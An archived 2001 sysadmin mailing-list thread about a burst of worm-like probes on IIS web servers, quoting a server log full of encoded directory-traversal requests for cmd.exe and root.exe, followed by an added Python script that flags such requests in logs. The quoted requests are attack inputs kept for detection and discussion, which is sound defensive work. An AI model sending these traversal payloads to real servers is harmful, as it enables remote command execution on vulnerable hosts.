Did you apply the rollup fix, or just the code red fix?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ K.Borndale

----- Original Message -----
Sent: Tuesday, September 18, 2001 12:38 PM
Subject: RE: WARNING: Hacker Alert

If you have updated for Code Red, do we need to do anything?

-----Original Message-----
From: Marr, Chris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:22 PM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Usama Bin
........................

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 10:52 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert

Why do people gotta do this shit now?
damn...!

> -----Original Message-----
> From: Jason Morris [mailto:[EMAIL PROTECTED]]
> Sent: 18 September 2001 15:59
> To: NT System Admin Issues
> Subject: RE: WARNING: Hacker Alert
>
> CodeRed seems to have dwindled to nothing on my logs. But it's being
> replaced with the EXACT same lines you have below, and they stay consistent
> with the code red 2 methods of attacking the more local subnets.
>
> Jason Morris CCDA CCNP
> Network Administrator
> MJMC, Inc.
> 708-225-2350
> [EMAIL PROTECTED]
>
> -----Original Message-----
> From: Jason Morris [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:50 AM
> To: NT System Admin Issues
> Cc: '[EMAIL PROTECTED]'
> Subject: RE: WARNING: Hacker Alert
>
> Yes. It seems to be systems I have previously monitored hitting me with
> codered attacks. I bet someone is activating all of their children.
>
> Jason Morris CCDA CCNP
> Network Administrator
> MJMC, Inc.
> 708-225-2350
> [EMAIL PROTECTED]
>
> -----Original Message-----
> From: xylog [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 9:45 AM
> To: NT System Admin Issues
> Subject: WARNING: Hacker Alert
>
> All my public facing web servers at home and at my office have shown a
> huge continuous hacking activity. Has anyone seen similar? I fear this
> may be code red related or automated. Please comment if you have seen
> similar. Here is an excerpt from one logfile:
>
> 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> 63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>
> Confidential: This e-mail and any files transmitted with it are the
> property of Lanco International and/or its affiliates, are confidential, and
> are intended solely for the use of the individual or entity to whom this
> e-mail is addressed. If you are not one of the named recipient(s) or
> otherwise have reason to believe that you have received this message in
> error, please notify the sender at the above e-mail address and delete this
> message immediately from your computer. Any other use, retention,
> dissemination, forwarding, printing or copying of this e-mail is strictly
> prohibited.

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
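
Added example, not part of the original thread: a small triage script for log lines in the comma-separated layout quoted above. It groups cmd.exe / root.exe and encoded-traversal requests by client address and singles out any that the server answered with a 2xx status. The field names are inferred from the excerpt, and the sample lines, addresses, server name WEB01 and /app/login.cfm path are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Field order inferred from the excerpt (assumption, names are ours).
FIELDS = ("client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_in", "bytes_out",
          "status", "win32_status", "method", "target", "params")

# Constructed sample lines in the same layout (documentation-range addresses).
SAMPLE_LOG = """\
192.0.2.10, -, 9/18/01, 10:36:28, W3SVC4, WEB01, x.x.x.x, 0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
192.0.2.10, -, 9/18/01, 10:36:32, W3SVC4, WEB01, x.x.x.x, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
192.0.2.10, -, 9/18/01, 10:36:33, W3SVC4, WEB01, x.x.x.x, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
198.51.100.7, -, 9/18/01, 10:36:42, W3SVC4, WEB01, x.x.x.x, 156, 41, 13975, 200, 0, GET, /app/login.cfm, -,
203.0.113.5, -, 9/18/01, 10:37:02, W3SVC4, WEB01, x.x.x.x, 0, 72, 604, 200, 0, GET, /scripts/root.exe, /c+dir,
"""

PROBE = re.compile(r"(cmd|root)\.exe$|\.\.[\\/]", re.IGNORECASE)

def parse_line(line):
    parts = [p.strip() for p in line.rstrip().rstrip(",").split(",")]
    return dict(zip(FIELDS, parts)) if len(parts) == len(FIELDS) else None

def is_probe(target):
    # Decode repeatedly so %5c, %2f and double-encoded forms are all seen.
    prev = None
    while target != prev:
        prev, target = target, unquote(target)
    return bool(PROBE.search(target))

def summarize(log_text):
    report = defaultdict(lambda: {"hits": 0, "served": []})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec["target"]):
            entry = report[rec["client_ip"]]
            entry["hits"] += 1
            if rec["status"].startswith("2"):   # server answered the probe
                entry["served"].append(rec["target"])
    return dict(report)

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        flag = "INVESTIGATE" if info["served"] else "blocked"
        print(f"{ip}: {info['hits']} probe(s), {flag} {info['served']}")
```

In the excerpt quoted in the thread every such request came back 404 or 500; a 2xx answer to one of these paths is the case that warrants a closer look at the host.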